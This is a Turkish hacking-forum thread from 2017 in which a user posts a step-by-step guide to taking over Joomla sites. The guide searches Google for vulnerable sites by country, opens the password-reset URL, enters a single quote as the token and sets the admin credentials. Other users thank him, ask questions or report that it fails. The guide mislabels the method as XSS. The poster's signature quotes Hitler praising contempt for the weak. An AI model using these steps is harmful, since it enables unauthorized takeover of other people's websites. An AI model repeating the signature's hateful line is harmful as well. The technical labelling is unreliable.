THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

chat
Seçenekler

☆XSS Açığı Üzerinden Site Hacklemek//Stajyer☆

ViceXx - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2017
Nereden:
Gitti O
Yaş:
19
Mesajlar:
631
Konular:
54
Teşekkür (Etti):
126
Teşekkür (Aldı):
321
Ticaret:
(0) %
02-05-2017 21:42
#1
Exclamation
☆XSS Açığı Üzerinden Site Hacklemek//Stajyer☆
Herkeze merhabalar;
Bugün size XSS açığı ile site hacklemeyi anlatıcam.


1. Googleye açın ve bunu yazın
Kod:
Kod:
/index.php?&option=com
Not: Mesela Hollanda sitesini hacklemek istiyorsanız
Kod:
Kod:
/index.php?&option=com site:nl
yapmanız lazım.
Mesela rusya istiyorsanız
Kod:
Kod:
/index.php?&option=com site:ru
ülke domainlerini googlede bulabilirsiniz zaten


2.Bir siteye tıklayın

3. altaki resimdeki gibi (/) eğik çizgiye kadar silin

not: (/) eğik çizgiyi silmeyin






4. sildiğimiz yere bunu yapıştırın
Kod:
Kod:
index.php?option=com_user&view=reset&layout=confirm





5.enter'a basın


6.karşınıza
Kod:
code:
diye yazı çıkacak . başka yazılarda olabilir . bu sadece örnekti


7. code:
yazan yere, tırnak işareti koyun
Kod:
Kod:
'



8.göndere basın (ben türkçe diline çevirdiğim için gönder yazıyor sizde başka bişey yazabilir




9.aşağıdaki resim gibi bişey gelicek .
kullancı adını admin yapın
şifreyi admin yapın


Kod:
http://imgim.com/6619incis1603664.png

10. Artık siteye yönetici olarak giriş yapabilirsiniz ve hackleyebilirsiniz



İnşallah Yararlı Olur
Görseller bana ait değildir
Anlatim bana aittir
Kendinize iyi bakin
--------------------- Zayıfa acımak doğaya ihanettir ve hayat güçsüzlüğü affetmez ...

Adolf Hitler.....

Konu ViceXx tarafından (14-05-2017 21:11 Saat 21:11 ) değiştirilmiştir.
FiberCL, Vibe Teşekkür etti.
versen5656 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
02/2015
Mesajlar:
3.316
Konular:
68
Teşekkür (Etti):
10
Teşekkür (Aldı):
358
Ticaret:
(0) %
02-05-2017 21:45
#2
eline saglık
--------------------- 10101010101010100101010100000101010101
1111 0000 1111 000 111 000 11100 11111 00000 1111 0000 000111 188 177 191 178 185 184 186 187 192 193 190 178 179 175 176 194 195 196 197
101010101010101010100101
ViceXx - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2017
Nereden:
Gitti O
Yaş:
19
Mesajlar:
631
Konular:
54
Teşekkür (Etti):
126
Teşekkür (Aldı):
321
Ticaret:
(0) %
02-05-2017 21:54
#3
Alıntı:
versen5656´isimli üyeden Alıntı Mesajı göster
eline saglık
Teşekkür ederim
--------------------- Zayıfa acımak doğaya ihanettir ve hayat güçsüzlüğü affetmez ...

Adolf Hitler.....

I am nobody - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2016
Mesajlar:
1.076
Konular:
97
Teşekkür (Etti):
230
Teşekkür (Aldı):
314
Ticaret:
(0) %
02-05-2017 21:57
#4
Bence bu kadar kokay deil
'WXR - ait Kullanıcı Resmi (Avatar)
İstihbarat Tim (Stajyer)
Üyelik tarihi:
11/2015
Mesajlar:
651
Konular:
0
Teşekkür (Etti):
231
Teşekkür (Aldı):
303
Ticaret:
(0) %
02-05-2017 22:00
#5
Token istiyor
---------------------
En büyük savaş, cahilliğe karşı yapılan savaştır.
MyGf - ait Kullanıcı Resmi (Avatar)
Researcher
Üyelik tarihi:
07/2016
Nereden:
Hall of Fame
Mesajlar:
3.283
Konular:
319
Teşekkür (Etti):
513
Teşekkür (Aldı):
1315
Ticaret:
(0) %
02-05-2017 22:00
#6
Dostum bu dork ne işe yarıyor anlatsan daha iyi olurdu. Bildiğim kadarıyla yetkili olmadığın halde admin şifre değiştirebiliyorsun.
Bu da admin bypass gibi işliyor.
Eline sağlık

Edit:10 dakikadır deniyorum 1 site gelmedi
Konu MyGf tarafından (02-05-2017 22:13 Saat 22:13 ) değiştirilmiştir.
Folyx - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2017
Mesajlar:
1.961
Konular:
97
Teşekkür (Etti):
205
Teşekkür (Aldı):
164
Ticaret:
(0) %
02-05-2017 22:03
#7
Elline Sağlık
bokskinq - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2016
Mesajlar:
76
Konular:
20
Teşekkür (Etti):
3
Teşekkür (Aldı):
0
Ticaret:
(0) %
02-05-2017 22:06
#8
bu kadar basitmi ? ve her xss açığında çalışıyormu ?
ViceXx - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2017
Nereden:
Gitti O
Yaş:
19
Mesajlar:
631
Konular:
54
Teşekkür (Etti):
126
Teşekkür (Aldı):
321
Ticaret:
(0) %
02-05-2017 22:07
#9
Alıntı:
bokskinq´isimli üyeden Alıntı Mesajı göster
bu kadar basitmi ? ve her xss açığında çalışıyormu ?
Her XSS de çalışmıyor ama 1/20 işliyor
--------------------- Zayıfa acımak doğaya ihanettir ve hayat güçsüzlüğü affetmez ...

Adolf Hitler.....

OmerFarukHan - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2017
Nereden:
Sinop
Mesajlar:
1.612
Konular:
34
Teşekkür (Etti):
101
Teşekkür (Aldı):
126
Ticaret:
(0) %
02-05-2017 22:25
#10
Hocam elinize sağlık hemen denemeliyim
--------------------- 2019 Dönüş Vakti Olacak.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler